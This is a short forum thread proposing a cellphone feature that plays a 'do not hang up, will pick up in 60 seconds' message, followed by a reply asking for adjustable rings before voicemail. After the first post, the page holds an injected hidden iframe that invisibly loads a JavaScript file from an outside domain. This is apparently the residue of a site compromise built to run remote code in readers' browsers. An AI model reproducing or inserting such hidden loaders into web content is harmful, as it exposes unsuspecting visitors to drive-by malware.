is there a "hold 1 sec" answering program?

what would be great is an INTELLIGENT phone answering system . . .

you're at a movie, or a restaurant, or a jazz club, anywhere that a cellphone conversation is inapropriate. . . .
. . . with the cell set to vibrate, the caller id tells you your incoming call is from your little sister away at college . . .

so you press a button and, start walking to an exit, and the caller hears . . .

"DO NOT HANG UP, Tony can't answer at the moment, but will pick up your call in 60 seconds"

if you don't hit the button by the 5th ring/vibrate, the call goes to standard voice mail<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I think the idea is a very good one. I would only add that I would like to be able to adjust the number of rings prior to going to voice mail. In my region of Verizon Wireless, Michigan & Ohio, we cannot change the standard 5 rings time limit prior to going to VM. Most callers will wait more rings, so I would like to raise the limit to 8-10 rings.

Good idea on the message...

Rob.
